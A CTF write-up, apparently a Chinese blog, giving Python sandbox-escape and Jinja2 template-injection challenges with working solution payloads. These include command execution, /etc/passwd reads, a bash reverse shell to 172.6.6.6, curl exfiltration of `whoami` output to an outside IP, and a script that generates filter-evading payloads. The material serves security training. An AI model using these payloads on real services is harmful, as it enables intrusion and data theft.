前置知识学习 我就不照抄一遍了 本博客主要是放题目
https://www.k0rz3n.com/2018/05/04/Python%20%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E5%A4%87%E5%BF%98/
https://hatboy.github.io/2018/04/19/Python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8%E6%80%BB%E7%BB%93/
1. python2
➜ ~ python2
Python 2.7.17 (default, Jul 20 2020, 15:37:01)
[GCC 7.5.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> def func():
... return 1
...
>>> func.func_globals
{'__builtins__': <module '__builtin__' (built-in)>, '__name__': '__main__', '__doc__': None, 'func': <function func at 0x7faa32da59d0>, '__package__': None}
绕过方案:
# 利用file()函数读取文件:
print(().__class__.__bases__[0].__subclasses__()[40]('./test.py').read())
# 执行系统命令:
print(().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ls'))
# 等效于下面语句,但是无法绕过
print(().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals['linecache'].os.system('ls'))
# 执行系统命令:
print(().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").system("ls")'))
# 重新载入__builtins__:
print(().__class__.__bases__[0].__subclasses__()[59]()._module.__builtins__['__import__']("os").system("ls"))
2. python3
# 利用 _frozen_importlib._ModuleLock
print("".__class__.__mro__.__getitem__(1).__subclasses__()[64].__init__.__globals__["__builtins__"]["__import__"]("os").popen("whoami").read())
3. tricky
题目万变不离其宗
- 没过滤引号
- 各种绕过 十六进制绕过【“o”+“s”】【"\x6fs"】【base64】
- 过滤引号
- 利用其他参数请求带入 利用语法糖
((request|attr(request.values.aa))) ((request|attr(request.args.aa))) ((request|attr(request.form.aa)))
实战代码from flask import request from jinja2 import Template In [73]: msg = '{{""|attr("encode")()}}' In [74]: Template("Good Job! " + msg + " . But sorry, there isn't flag").render() Out[74]: "Good Job! b'' . But sorry, there isn't flag" # 字符转换 In [77]: msg = '{{""|attr("encode")()|attr("fromhex")("323334")|attr("decode")()}}' In [78]: Template("Good Job! " + msg + " . But sorry, there isn't flag").render() Out[78]: "Good Job! 234 . But sorry, there isn't flag" # 打印 In [81]: msg = "{%print(11*11)%}" In [82]: Template("Good Job! " + msg + " . But sorry, there isn't flag").render() Out[82]: "Good Job! 121 . But sorry, there isn't flag"import requests import urllib.parse payload = "((request|attr(request.form.aa))|attr(request.form.bb)|list).pop(-1)|attr(request.form.cc)()|attr(request.form.dd)(59)()|attr(request.form.ee)|attr(request.form.ff)|attr(request.form.gg)|attr(request.form.hh)(request.form.ii)|attr(request.form.jj)()" payload = urllib.parse.quote(payload) print(payload) url = r'http://121.37.182.111:30994/success?msg={{' + payload + r'}}' data = { 'aa':'__class__', 'bb':'__mro__', 'cc':'__subclasses__', 'dd':'__getitem__', 'ee':'_module', 'ff':"linecache", 'gg':'os', 'hh':'popen', 'ii':'cat flag.txt', 'jj':'read' } r = requests.get(url=url,data=data) print(r.content.decode())- 利用chr
{% set chr=().__class__.__bases__.__getitem__(0).__subclasses__()[59].__init__.__globals__.__builtins__.chr %}{{ ().__class__.__bases__.__getitem__(0).__subclasses__().pop(40)(chr(47)%2bchr(101)%2bchr(116)%2bchr(99)%2bchr(47)%2bchr(112)%2bchr(97)%2bchr(115)%2bchr(115)%2bchr(119)%2bchr(100)).read() }} - 过滤双花括号
#用{%%}标记
{% if ''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://127.0.0.1:7999/?i=`whoami`').read()=='p' %}1{% endif %}
这样会没有回显,考虑带外或者盲注
# 用{%print%}标记,有回显
{%print config%}
- 过滤[
对于列表和字典类型,可以用__getitem__
In [24]: [1,23,4][1]
Out[24]: 23
In [25]: [1,23,4].__getitem__(1)
Out[25]: 23
In [26]: d = {'a':'1'}
In [27]: d.__getitem__('a')
Out[27]: '1'
4. 训练题
- 第一个挑战
python2.7
from __future__ import print_function
print('''pysandbox1: checkin
Welcome, this is a normal Python2.7 shell, can you get flag in ./flag?''')
try:
input = raw_input
except:
pass
c = input()
x=globals
_eval = eval
print(_eval(c))
解答:
由于没有其他限制,可直接open('/flag').read()
也可以__import__("os").system("cat /flag")
也可以().__class__.__bases__[0].__subclasses__()[40](r'/flag').read()
>>> for x in range(500):
... print (x,(''.__class__.__mro__[2].__subclasses__()[x]))
...
(0, <type 'type'>)
(1, <type 'weakref'>)
(2, <type 'weakcallableproxy'>)
(3, <type 'weakproxy'>)
(4, <type 'int'>)
(5, <type 'basestring'>)
(6, <type 'bytearray'>)
(7, <type 'list'>)
(8, <type 'NoneType'>)
(9, <type 'NotImplementedType'>)
(10, <type 'traceback'>)
(11, <type 'super'>)
(12, <type 'xrange'>)
(13, <type 'dict'>)
(14, <type 'set'>)
(15, <type 'slice'>)
(16, <type 'staticmethod'>)
(17, <type 'complex'>)
(18, <type 'float'>)
(19, <type 'buffer'>)
(20, <type 'long'>)
(21, <type 'frozenset'>)
(22, <type 'property'>)
(23, <type 'memoryview'>)
(24, <type 'tuple'>)
(25, <type 'enumerate'>)
(26, <type 'reversed'>)
(27, <type 'code'>)
(28, <type 'frame'>)
(29, <type 'builtin_function_or_method'>)
(30, <type 'instancemethod'>)
(31, <type 'function'>)
(32, <type 'classobj'>)
(33, <type 'dictproxy'>)
(34, <type 'generator'>)
(35, <type 'getset_descriptor'>)
(36, <type 'wrapper_descriptor'>)
(37, <type 'instance'>)
(38, <type 'ellipsis'>)
(39, <type 'member_descriptor'>)
(40, <type 'file'>)
(41, <type 'PyCapsule'>)
(42, <type 'cell'>)
(43, <type 'callable-iterator'>)
(44, <type 'iterator'>)
(45, <type 'sys.long_info'>)
(46, <type 'sys.float_info'>)
(47, <type 'EncodingMap'>)
(48, <type 'fieldnameiterator'>)
(49, <type 'formatteriterator'>)
(50, <type 'sys.version_info'>)
(51, <type 'sys.flags'>)
(52, <type 'exceptions.BaseException'>)
(53, <type 'module'>)
(54, <type 'imp.NullImporter'>)
(55, <type 'zipimport.zipimporter'>)
(56, <type 'posix.stat_result'>)
(57, <type 'posix.statvfs_result'>)
(58, <class 'warnings.WarningMessage'>)
(59, <class 'warnings.catch_warnings'>)
(60, <class '_weakrefset._IterationGuard'>)
(61, <class '_weakrefset.WeakSet'>)
(62, <class '_abcoll.Hashable'>)
(63, <type 'classmethod'>)
(64, <class '_abcoll.Iterable'>)
(65, <class '_abcoll.Sized'>)
(66, <class '_abcoll.Container'>)
(67, <class '_abcoll.Callable'>)
(68, <type 'dict_keys'>)
(69, <type 'dict_items'>)
(70, <type 'dict_values'>)
(71, <class 'site._Printer'>)
(72, <class 'site._Helper'>)
(73, <type '_sre.SRE_Pattern'>)
(74, <type '_sre.SRE_Match'>)
(75, <type '_sre.SRE_Scanner'>)
(76, <class 'site.Quitter'>)
(77, <class 'codecs.IncrementalEncoder'>)
(78, <class 'codecs.IncrementalDecoder'>)
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
IndexError: list index out of range
- 第二个挑战
python2.7linecachewarnings.catch_warnings
from __future__ import print_function
print('''pysandbox2: easy
how about eval in empty dict? Python2.7 ./flag''')
try:
input = raw_input
except:
pass
c = input()
x=globals
_eval = eval
print(_eval(c, {'__builtins__':{}}, {}))
解答:
().__class__.__bases__[0].__subclasses__()[59]()._module.linecache.os.system('cat /flag')
或者().__class__.__bases__[0].__subclasses__()[59]()._module.__builtins__['__import__']("os").system("cat /flag")
3、第三个挑战
类似的 不过先要ls
from __future__ import print_function
print('''pysandbox3: easy ls
how about eval in empty dict? Python2.7
flag in current folder, but not ./flag''')
try:
input = raw_input
except:
pass
c = input()
x=globals
_eval = eval
print(_eval(c, {'__builtins__':{}}, {}))
4、第四个挑战 python2.6.6 warnings.catch_warnings
from __future__ import print_function
print('''pysandbox4: clear sys.modules
let's continue, how about sys.modules.clear()? Python2.6.6
flag in current folder, but not ./flag''')
try:
input = raw_input
except:
pass
c = input()
x=globals
_eval = eval
import sys
sys.modules['os']=None
print(_eval(c, {'__builtins__':{}}, {}))
这道题把os搞掉了有没有办法呢?
有!由于换到了2.6.6的环境我们需要再fuzz一遍之前的数字,python的写法让我们可以跳过fuzz的环节 直接找要的东西
[t for t in ().__class__.__bases__[0].__subclasses__() if t.__name__=="catch_warnings"][0]()._ module.linecache.os.system("cat /flag")
5、第五个挑战 python3.7 _wrap_close FileLoader
from __future__ import print_function
print('''pysandbox5: clear sys.modules py3
almost same, but move to higher version: Python3.7 with sys.modules.clear()
try `cat /flag`''')
try:
input = raw_input
except:
pass
c = input()
x=globals
_eval = eval
import sys
sys.modules.clear()
print(_eval(c, {'__builtins__':{}}, {}))
现在我们把环境提升到3.7 并使用了命令sys.modules.clear()还有办法吗?
[x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "_wrap_close"][0].close.__globals__["system"]("cat /flag")
[x for x in ().__class__.__bases__[-1].__subclasses__() if x.__name__ == 'FileLoader'] [0].get_data('','/flag')
6、第六个挑战
from __future__ import print_function
print('''pysandbox6: clear __builtins__
why don't we also clear the __builtins__ so that eval can be easier?''')
try:
input = raw_input
except:
pass
c = input()
x=globals
_eval = eval
import sys
sys.modules.clear()
for i in list(__builtins__.__dict__.keys()):
if i not in ["print", "list", ]:
del(__builtins__.__dict__[i])
print(_eval(c))
同第五题
7、第七个挑战
from __future__ import print_function
print('''pysandbox7: del os.system
how can you call system function after del(os.system)?''')
try:
input = raw_input
except:
pass
c = input()
x=globals
_eval = eval
import os
del(os.system)
import sys
sys.modules.clear()
for i in list(__builtins__.__dict__.keys()):
if i not in ["print", "list", ]:
del(__builtins__.__dict__[i])
print(_eval(c))
把system过滤掉了
[x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "_wrap_close"][0].close.__globals__["execl"]("/bin/cat","cat","/flag")
下面这个很稳呐
[x for x in ().__class__.__bases__[-1].__subclasses__() if x.__name__ == 'FileLoader'] [0].get_data('','/flag')
8.第八个挑战
from __future__ import print_function
print('''pysandbox10: del __import__ no mercy
no mercy, delete them all''')
try:
input = raw_input
except:
pass
c = input()
x=globals
_eval = eval
import importlib
del(importlib.__dict__['__import__'])
del(importlib._bootstrap.__dict__['__import__'])
import os
os.__dict__.clear()
import sys
sys.modules.clear()
for i in list(__builtins__.__dict__.keys()):
if i not in ["print", "list", ]:
del(__builtins__.__dict__[i])
for i in list(x().keys()):
if i not in ["x", "print", "_eval", "c", ]:
del(x()[i])
print(_eval(c))
[x for x in ().__class__.__bases__[-1].__subclasses__() if x.__name__ == 'FileLoader'] [0].get_data('','/flag')
[x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "BuiltinImporter"][0]().load_module("posix").system("cat /flag")
[x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "_ImportLockContext"][0].__exit__.__globals__["_imp"].create_builtin([x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "ModuleSpec"][0](name='posix', loader=[x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "BuiltinImporter"][0]())).system("cat /flag")
9.第九个挑战
from __future__ import print_function
print('''pysandbox9: number filter
here, we do not accept numbers
''')
try:
input = raw_input
except:
pass
c = input()
x=globals
_eval = eval
for i in range(0,10):
if str(i) in c: raise Exception("not allowed")
for i in list(__builtins__.__dict__.keys()):
if i not in ["print", "list", ]:
del(__builtins__.__dict__[i])
for i in list(x().keys()):
if i not in ["x", "print", "_eval", "c", ]:
del(x()[i])
print(_eval(c))
过滤了数字,很简单
[x for x in ().__class__.__bases__[([]<[])-([]==[])].__subclasses__() if x.__name__ == 'FileLoader'] [[]<[]].get_data('','/flag')
[x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "_wrap_close"][[]<[]].close.__globals__["system"]("cat /flag")
10.第10个挑战
from __future__ import print_function
print('''pysandbox15: string filter
here, we do not accept strings
''')
try:
input = raw_input
except:
pass
c = input()
x=globals
_eval = eval
for i in ['"', "'"]:
if str(i) in c: raise Exception("not allowed")
for i in list(__builtins__.__dict__.keys()):
if i not in ["print", "list", ]:
del(__builtins__.__dict__[i])
for i in list(x().keys()):
if i not in ["x", "print", "_eval", "c", ]:
del(x()[i])
print(_eval(c))
过滤了字符串
flask ssti
11. 过滤os+字符串
@app.route('/oops_you_can_not_see_me/<name>')
def mybackdoor(name):
blacklist = ['os','exec']
for x in blacklist:
if x in name:
name = 'attack detected!'
for i in range(0,10):
if str(i) in name:
name = "number is not allowed!"
t = Template('Hello '+name)
return t.render()
{{().__class__.__bases__[[]<[]].__subclasses__()[([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])]().__init__.func_globals['linecache'].__dict__['o'+'s'].popen('cat %d.txt'%([]==[])).read()}}
{{().__class__.__base__.__subclasses__()[59].__init__.__getattribute__('func_global'+'s')['linecache'].__dict__['o'+'s'].__dict__['popen']('l'+'s').read()}}
{% if ''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://39.105.116.195:8080/?i=`whoami`').read()=='p' %}1{% endif %}
12、过滤引号+数字
这种的才可以回显 system相关的不会回显 只会有一个返回值 但是可以用它反弹shell
().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__('func_global'+'s')['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('bash -c "bash -i >& /dev/tcp/172.6.6.6/9999 0>&1"')
下面的可以回显
{{().__class__.__base__.__subclasses__()[365].close.__globals__["__builtins__"]['open']("1.txt").read()}}
{{().__class__.__bases__[0].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}
利用__doc__拼接字符,获取当前目录下1.txt文件内容
payload如下
import requests,math
# get the index
url = """http://127.0.0.1:5000/oops_you_can_not_see_me/{0}"""
payload = """{{().__class__.__base__.__subclasses__()}}"""
newurl = url.format(payload)
print (newurl)
r = requests.get(newurl)
mycontent = (r.content)[5:]
mycontent = mycontent.replace('<','\"<')
mycontent = mycontent.replace('>','>\"')
s = (eval(mycontent))
trueid = (s.index("<class 'os._wrap_close'>"))
print ('index='+str(trueid))
def factor(x):
mylist = []
for i in range(2,int(math.sqrt(x))+1):
while x%i==0:
x/=i
mylist.append(i)
if x>1:
mylist.append(x)
return mylist
def get(x):
s = ''
for i in range(x):
if i==0:
s = '([]==[])'
else:
s += '+([]==[])'
return s
def gen_payload(x):
if x==0:
return '[]<[]'
if x==1:
return '[]==[]'
mylist = factor(x)
print(mylist)
s = ''
for myid,i in enumerate(mylist):
if myid == 0:
s = '(%s)'%(get(i))
else:
s += '*(%s)'%(get(i))
return s
doc = "int.to_bytes(length, byteorder, *, signed=False) -> bytes\n\nReturn an array of bytes representing an integer.\n\nThe integer is represented using length bytes. An OverflowError is\nraised if the integer is not representable with the given number of\nbytes.\n\nThe byteorder argument determines the byte order used to represent the\ninteger. If byteorder is 'big', the most significant byte is at the\nbeginning of the byte array. If byteorder is 'little', the most\nsignificant byte is at the end of the byte array. To request the native\nbyte order of the host system, use `sys.byteorder' as the byte order value.\n\nThe signed keyword-only argument determines whether two's complement is\nused to represent the integer. If signed is False and a negative integer\nis given, an OverflowError is raised."
x_doc = "__xor__"
# newurl = url.format(payload)
# r = requests.get(newurl)
# print (r.content)
def gen_string(x):
s = ''
for i in range(len(x)):
if i==0:
try:
myid = doc.index(x[i])
# print ('????',myid)
s = '([]<[]).to_bytes.__doc__[%s]'%(gen_payload(myid))
except:
myid = x_doc.index(x[i])
s = '([]<[]).__xor__.__name__[%s]'%(gen_payload(myid))
else:
try:
myid = doc.index(x[i])
s += '+([]<[]).to_bytes.__doc__[%s]'%(gen_payload(myid))
except:
myid = x_doc.index(x[i])
s += '+([]<[]).__xor__.__name__[%s]'%(gen_payload(myid))
return s
print ('>>>'+'([]<[]).to_bytes.__doc__[32]+'+gen_string('.txt'))
img_doc ="int(x=0) -> integer\nint(x, base=10) -> integer\n\nConvert a number or string to an integer, or return 0 if no arguments\nare given. If x is a number, return x.__int__(). For floating point\nnumbers, this truncates towards zero.\n\nIf x is not a number or if base is given, then x must be a string,\nbytes, or bytearray instance representing an integer literal in the\ngiven base. The literal can be preceded by '+' or '-' and be surrounded\nby whitespace. The base defaults to 10. Valid bases are 0 and 2-36.\nBase 0 means to interpret the base from the string as an integer literal.\n>>> int('0b100', base=0)\n4"
payload = """{{().__class__.__base__.__subclasses__()[%s].close.__globals__[%s][%s](%s).read()}}"""%(gen_payload(trueid), gen_string("__builtins__"),gen_string('open'),'([]<[]).imag.__doc__[%s]+'%(get(32))+gen_string('.txt'))
newurl = url.format(payload)
print (newurl)
r = requests.get(newurl)
print (r.content)
http://127.0.0.1:5000/oops_you_can_not_see_me/{{().__class__.__base__.__subclasses__()[(([]==[])+([]==[])+([]==[]))*(([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[]))].close.__globals__[([]<[]).to_bytes.__doc__[(([]==[])+([]==[]))*(([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[]))*(([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[]))*(([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[[]<[]]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[[]<[]]+([]<[]).to_bytes.__doc__[[]==[]]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[]))*(([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[]))*(([]==[])+([]==[])+([]==[]))]][([]<[]).to_bytes.__doc__[(([]==[])+([]==[])+([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[]))*(([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[]))*(([]==[])+([]==[])+([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[[]==[]]](([]<[]).imag.__doc__[([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])+([]==[])]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[]))]+([]<[]).__xor__.__name__[(([]==[])+([]==[]))]+([]<[]).to_bytes.__doc__[(([]==[])+([]==[]))]).read()}}
扫一扫
726
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
